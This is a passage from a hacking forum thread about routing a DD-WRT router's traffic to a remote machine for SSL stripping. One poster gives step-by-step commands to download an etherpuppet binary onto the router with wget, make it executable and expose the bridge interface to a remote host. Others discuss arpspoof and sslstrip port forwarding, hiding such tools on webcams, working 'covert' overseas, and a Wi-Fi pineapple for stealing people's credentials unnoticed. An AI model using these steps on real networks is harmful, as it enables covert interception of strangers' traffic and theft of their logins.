Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17

Thread: dd-wrt redirecting traffic to a sslstrip box

  1. #11
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default

    I finally got some spare time to work on this and got this working.

    The software that will do this is etherpuppet.

    The developer has both a regular linux version that can be used in backtrack and a linksys router version that can be run on the router.

    By installing Etherpuppet on the linksys router, you can send all traffic from a chosen interface to a remote workstation so that it can be manipulated and sent back.

    SSL strip worked fine on the traffic on both of my DD-WRT routers.
    And so did any other program that I tried, for example metasploit.
    I used the br0:0 interface on the router

    However I tried another a couple of other DD-WRT routers (older ones), which did not have the br0:0 interface, and etherpuppet could not keep the connection. Could have something to do with the older version of DD-WRT or it could just be the different chipset. Mine are the Asus PN16 and WGL

    I am still trying to figure out how to start an br0:0 interface or what interface besides br0:0 will work on these other routers as I had no problem running etherpuppet on them.

    Also etterpuppet works great connecting two workstations this way.
    I am not sure why it is not included in backtrack considering it is such a useful tool!

    Sample command lines:

    On linksys router:
    etterpuppet -s 888 -i br0:0
    # This makes the br0:0 interface available on port 888 for any computer to connect and use.

    On backtrack:
    etterpuppet -c 192.168.0.xxx:888 -m -I myinterface
    # This tells it to connect to an IP address and port number in master mode and create a new interface.

    remember to use ifconfig myinterface up
    to bring up your new interace

    after downloading:
    just rename etherpuppet-mipsel to anything, upload it to you router (chmod 777) and run it.

    For the linux version, you need to compile it for backtrack, which is really easy and instructions are on the website



    Quote Originally Posted by bl0tch View Post
    any of you figured out the prerouted forwarding part for the dd-wrt? i thought i had it with http redirect in the hotspot tab but havent gotten it to work it may be meant for just within the network while im trying to send all packets over the net to a proxy. i cant imagine it should be so hard to figure out how to forward everything outside the lan to a proxy but after weeks i still cant get it working no matter what i try.
    Quote Originally Posted by Carto_ View Post
    I don't have any python code here yet but i'll give you that soon.

    For the SD hack, it's ok for my part but a question persist :

    How do you add more RAM and usb as extra storage ?
    (WRT54G?)
    I don't think you can add more RAM. As far as the USB, the router either comes with it or not. The SD hack is not so difficult and would give you all the storage you need.

    Better just to get a better router with more ram. I am using the Asus N16 with 128 MB Ram, USB and a faster CPU. There may be some newer ones out there.

    Sorry, this is a double post please delete
    Last edited by Archangel-Amael; 11-02-2010 at 06:54 PM.

  2. #12
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    2

    Default Re: dd-wrt redirecting traffic to a sslstrip box

    wow this sounds really exciting! can i get some more help on setting this up on the dd-wrt end? not sure how to execute and set it up im able to ssh in with putty to exectute commands and use winscp to upload the file but im still unsure how to get it up and running.something about enabling something in the router or setting up dirs and permissions? thanks!

  3. #13
    Junior Member
    Join Date
    Jan 2010
    Posts
    40

    Default Re: dd-wrt redirecting traffic to a sslstrip box

    I will try to do a proper tutorial when I have more time. in the meantime
    Here is what I do:

    #go the the tmp dir
    cd /tmp

    #Download the file
    wget http://www.secdev.org/projects/ether...rpuppet-mipsel

    # give it run permissions
    chmod 777 etherpuppet-mipsel

    # run it
    etherpuppet-mipsel -s 999 -i br0

    #Run on your pc:
    etherpuppet -c xxx.xxx.xxx.xxx:999 -m -I myinterface
    ifconfig myinterface up

    I am doing some more experiments and it works on other devices besides router. For example the power PC version runs on dreambox Satelite Receivers. Also works on my webcam! Scary the places that you can hide these things!

    Quote Originally Posted by bromhexine View Post
    wow this sounds really exciting! can i get some more help on setting this up on the dd-wrt end? not sure how to execute and set it up im able to ssh in with putty to exectute commands and use winscp to upload the file but im still unsure how to get it up and running.something about enabling something in the router or setting up dirs and permissions? thanks!

  4. #14
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    10

    Default

    thank you so much

    having trouble verifying if sslstrip is actually working. do i use the same settings as when doing arpspoof on my own lan and forwarding port 80 to 10000? or is there an extra step ive missed in forwarding the right ports or interfaces? i definitely see traffic though just havent been able to collect any stripped ssl sessions. i should mention im doing this overseas and thats probably not the best idea if working covert because google.com now goes to google.co.uk instead of google.ca as well anything thats done n the other end goes through you so if they're joining al qaida etc then you may have some problems.
    Last edited by Archangel-Amael; 11-13-2010 at 08:22 PM.

  5. #15
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    2

    Default Re: dd-wrt redirecting traffic to a sslstrip box

    biotch try not arp spoofing and dont flip machine into forwarding mode.

  6. #16
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Unhappy Re: dd-wrt redirecting traffic to a sslstrip box

    has anyone been able to get this working? i can see the traffic on the other end but i cant figure out how to intercept with sslstrip i've tried everything it seems.

  7. #17
    Member
    Join Date
    Jan 2010
    Posts
    70

    Default Re: dd-wrt redirecting traffic to a sslstrip box

    Wish I had seen this thread earlier. There's already a decent project which does a lot of the stuff you'll want to do called Jasager. You might want to google 'hak5 pineapple', or 'jasager'. It's standard is run on the Fon, a pretty sweet little board, with, I think, 8MB of storage total on it; running a stripped version of linux + wifi "spoofing" tools. IE: it responds affirmatively to wireless host requests, and attempts to service requests for them.

    The reason it's called the 'pineapple' is because the Hak5 group showcased a version of it running off of 4 AA batteries, all fit inside a cup that looked like a pineapple. Basically, no one would ever know you were walking around with it, and you could steal all their credentials if you had the right rig.

Page 2 of 2 FirstFirst 12

Similar Threads

  1. Redirecting ALL traffic from one ethernet port to another
    By Lucifer in forum Beginners Forum
    Replies: 15
    Last Post: 08-26-2010, 06:44 PM
  2. passing traffic through sslstrip then through brup proxy ?
    By hoodadada in forum Beginners Forum
    Replies: 1
    Last Post: 06-07-2010, 03:57 PM
  3. mitm with etter cap redirecting to beef
    By crooks in forum OLD BackTrack 4 Software Related Issues
    Replies: 4
    Last Post: 10-24-2009, 05:28 AM
  4. 802.11p - traffic generator
    By TheMrOrange in forum OLD Newbie Area
    Replies: 9
    Last Post: 08-27-2009, 03:26 PM
  5. Arp poisoning / Redirecting to my own machine?
    By The Dan in forum OLD Specialist Topics
    Replies: 5
    Last Post: 01-08-2009, 11:19 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •